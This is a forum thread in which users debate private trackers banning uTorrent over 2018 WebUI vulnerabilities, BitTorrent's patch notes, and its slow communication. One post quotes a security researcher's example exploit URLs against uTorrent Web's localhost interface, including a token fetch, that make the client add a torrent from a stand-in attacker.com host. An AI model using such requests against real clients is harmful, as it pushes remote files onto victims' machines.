uTorrent on the way out?

[unknownsoldierx]

Numerous trackers are now banning all versions of uTorrent because of the latest exploits. I see no statement on the uTorrent blog or even any discussion on the forums. Why?

[mike20021969]

8 hours ago, unknownsoldierx said:

Numerous trackers

Numerous?

After a quick Google, all I could find was that GazelleGames (private torrent tracker) banned all versions.

Then they did a u-turn of sorts and allowed some builds...

Quote

uTorrent 1.8.x, 2.0.4, 2.1.x and 2.2.x.

https://www.reddit.com/r/trackers/comments/808dyy/gazellegames_bans_all_versions_of_utorrent/

 

[unknownsoldierx]

It was more of a comment on the lack of response, disclosures, or warnings of the exploits to users. There's no mention of this security problem on the utorrent website, blog, or forums.

So far it does seem to be private trackers.

 

.Click Group TheVault ThePlace TheGeeks TheEmpire TheOccult TheShow - removing utorrent 3.x off whitelist
https://www.reddit.com/r/trackers/comments/80np6r/click_group_thevault_theplace_thegeeks_theempire/

Awesome-hd uTorrent announcement
https://www.reddit.com/r/trackers/comments/80flpq/awesomehd_utorrent_announcement/
"uTorrent 3.x will be removed from the whitelist indefinitely."

APL: uTorrent versions 3.0 - 3.5.2 banned.
https://www.reddit.com/r/trackers/comments/80cxof/btn_utorrent_3x_removed_from_the_whitelist/

FILELIST UTorrent announcement
https://www.reddit.com/r/trackers/comments/80cx0e/filelist_utorrent_announcement/

PTP bans uTorrent
https://www.reddit.com/r/trackers/comments/7zvfig/ptp_bans_utorrent/

All versions of uTorrent removed from the Oppaitime whitelist.
https://www.reddit.com/r/trackers/comments/7zv0yi/all_versions_of_utorrent_removed_from_the/

RED announces uT 3.x ban, 2.x phase out plan.
https://www.reddit.com/r/trackers/comments/7zum5y/red_announces_ut_3x_ban_2x_phase_out_plan/

All versions of uTorrent removed from the AnimeBytes whitelist.
https://www.reddit.com/r/trackers/comments/7zshwu/all_versions_of_utorrent_removed_from_the/

[mike20021969]

38 minutes ago, unknownsoldierx said:

There's no mention of this security problem on the utorrent website, blog, or forums.

https://engineering.bittorrent.com/2018/02/22/httprpc-security-vulnerabilities-resolved-in-utorrent-bittorrent-and-utorrent-web/

[unknownsoldierx]

From the link you posted

Quote

The team began rolling out the update to beta uTorrent Windows users via the auto update mechanism on Feb 16, 2018

From the dude that discovered the exploit, written on Feb 20:

https://bugs.chromium.org/p/project-zero/issues/detail?id=1524

Quote

It turns out that BitTorrent just made added an additional token to uTorrent Web, and was still vulnerable to the same attack.

Previously, a request would look like this:

http://127.0.0.1:19575/gui/?localauth=token:&action=add-url&url=http://attacker.com/calc.exe.torrent

But now, they added a second token, so it looks like this:

http://127.0.0.1:19575/gui/?token=newtoken&localauth=token:&action=add-url&url=http://attacker.com/calc.exe.torrent

So...you just have to fetch that token as well, which comes from:

http://127.0.0.1:19575/gui/token.html?localauth=token:

Therefore, this issue is still exploitable. The vulnerability is now public because a patch is available, and BitTorrent have already exhausted their 90 days anyway. I see no other option for affected users but to stop using uTorrent Web and contact BitTorrent and request a comprehensive patch, we've done all we can to give BitTorrent adequate time, information and feedback and the issue remains unsolved.

 

This is what I see referenced in discussion. People are saying utorrent is still vulnerable, but it seems they are all confusing it with uTorrent Web.

If regular uTorrent is indeed fixed, there should be a statement released about it. More than just a post on the uTorrent engineering blog. There's a lot of misinformation going around.

[mike20021969]

There's also a heap of fixes for the current stable:

Quote

uTorrent 3.5.3 For Windows (build 44358)

February 22, 2018

---

– Use proper device pairing password when updating device info graphic
– Point Remote “Learn More” link to better URL
– Disable localhost/search lookup when making searches. Do not rely on the localhost port-10k discoverability
– Use a CRNG as a WebUI token source
– Require device/service pairing or standard webui authentication for the /proxy endpoint
– Sanity check Host header on HTTP requests
– Remove automatic discoverability feature over port 10000. The setting net.discoverable no longer exists.
– WebUI action getsettings is only allowed for fully authenticated user (not guest)
– Fix crash when sending malformed requests to /fileserve
– Fix forced re-install mode when same version is already installed
– Set uninstaller prompt dialog title
– Remove Nexway cart URLs
– License key information is no longer exposed via WebUI

http://blog.utorrent.com/releases/

A sticky on the forum clarifying what's what regarding this security vulnerability would be a good idea, rather than leaving it to users to hunt down the information surrounding this.

[Ryrynz]

This is exactly as unknownsoldier has said, people are saying the fix isn't complete and many places have banned it as a result.
Unless uTorrent show it's actually fixed properly, this client is as was said, "on the way out" and basically dead. I've already had to switch to qBittorrent
which has been a pain in the arse as it's nowhere near as reliable as uTorrent and is quite buggy still. Unfortunately usability isn't on the list as far as client approvals go..

I told them they needed to clarify things and sent them a link to that discussion mentioned above but they've done nothing..
The communication here has always been poor and this seems to extend further, they're killing their client.

Poor response time and the inability to prove that the fix is complete. Trackers aren't taking any chances.. There was already distrust with this client and now people have seemed to had enough. I also asked about whether the flash exploit had been plugged as other trackers jumped on that first back with 3.3.x but no response about that either. Honesty this is a simple fix, I'd like to see this client approved again by trackers but it requires something I don't think the Bittorrent team can muster.. Timely and thorough communication.

[unknownsoldierx]

Also, even more infuriating, apparently regular uTorrent and the new uTorrent Web share the same PeerID and report themselves as the same client. Site admins say that since uTorrent Web is still vulnerable, and they can't tell the difference between the two clients, even if classic uTorrent is fixed it doesn't matter.

[PiusX]

On 3/3/2018 at 2:27 PM, unknownsoldierx said:

Numerous trackers are now banning all versions of uTorrent because of the latest exploits. I see no statement on the uTorrent blog or even any discussion on the forums. Why?

Put this way how and why trackers do what they do has nothing to do with utorrent. You need to contact the site where your getting your torrents and complain to them.

14 hours ago, unknownsoldierx said:

Also, even more infuriating, apparently regular uTorrent and the new uTorrent Web share the same PeerID and report themselves as the same client. Site admins say that since uTorrent Web is still vulnerable, and they can't tell the difference between the two clients, even if classic uTorrent is fixed it doesn't matter.

Not sure what your doing but I have no problems using utorrent and downloading torrents. Maybe one should stay away from tracked torrents and site to avoid DMCA blocks or ISP blocks.

[icebox]

Testing has been done to show that the new release doesn't fully solve the problem, even if the original vulnerability doesn't work anymore.  I'd like to see a proper fix that actually gets rid of the error, or at the least allows us to shut down the web interface that the exploits target.  I don't want to change to a different client and the fact that this hasn't been solved is propting a fair number of sites to continue banning 3.5.3.  And the revelation above that the peer id for the new web client is the same as classic, well, shouldn't different clients have different peer ids?  Utorrent, please fix this!!!!

And @PiusX, if the client is getting banned because it still has a security error, that is certainly utorrent's problem, and utorrent does need to care about user and torrent site safety. 

[xriothhh]

Indeed, many private trackers feel as though they cannot trust the word of Bittorrent Inc when they claim that the vulnerability was fixed, so a good portion of influential private trackers have banned all of 3.x, some saying they will never whitelist newer versions again and only allows 2.2.1 and 2.0.4; and a few have even blanket banned all of uTorrent.

You guys need to make this a top priority and pay an independent security researcher to make sure the vulnerability is fully fixed and have them put out the report so that private trackers again consider whitelisting a 3.x version, otherwise you are going to lose many users and uTorrent and Bittorrent [the client] will no longer be financially sustainable products. 

Clients do not succeed in usage rates if a majority of private trackers ban their usage. Exhibit A: Azureus - 10 or so years ago almost all private trackers banned the use of it. And it quickly faded into irrelevancy. 

This needs to be taken very seriously unless you no longer care about this product. While you're at it, hire better developers and make them more visible with Twitter accounts and e-mail addresses that users can contact. Set up an issue tracker that users can add to, with an attachment feature so they can attach crash dumps, memory dumps besides, log files, screenshots. Currently, the Bittorrent Inc developers seem to be invisible and are unreachable. They certainly don't seem to read this forum. I sometimes wonder if they care or if this is just a job to them and nothing more. 

[Jarod997]

I feel this community is slow to react to problems/issues in general.

[rafi]

11 hours ago, Jarod997 said:

I feel this community is slow to react to problems/issues in general.

Maybe the client is pretty stable, and most people simply have no issues, thus, don't visit here that often?...

 

[Ryrynz]

Rafi, you know how piss poor Bittorrent Inc is at communication. Hell they used to barely post logs. An admin some in for a bit once in a blue moon..

I've told them on the forums many times they need to buck their ideas up, they can't be bothered.. just want to "keep the lights on" while doing sweet F all of anything.
It's on the decline and so we know how that goes. If they listened to me, they'd be in a better place. They don't listen and they don't care.. these are obvious facts.

[rafi]

All I was saying is that a "community" is best at helping itself, and now - less people are visiting the forums.  This is both good and bad - it shows there are less problems in the client, but also - less help for those who needs help.

And true enough, the  devs presence/support here  is and was minimal.  When (if) they will release  4.x with plenty of bugs - this would be the time to be her...  

[Ryrynz]

One of the biggest issues was how hard it was for them to be contacted about this hole in the first place..

We needed them to be active and proactive in communication not a new client which apparently doesn't distinguish itself from it's other clients..
This all just goes from bad to worse now I'm forced to deal with the bug ridden Qbittorrent and it's only a matter of time before utorrent is deleted..

Was great while it lasted, RIP. 

[mike20021969]

19 minutes ago, Ryrynz said:

this hole

The "hole" which most likely affected 0% of users. And if it had, we would have been made aware of it years ago.

A hole blown out of all proportion.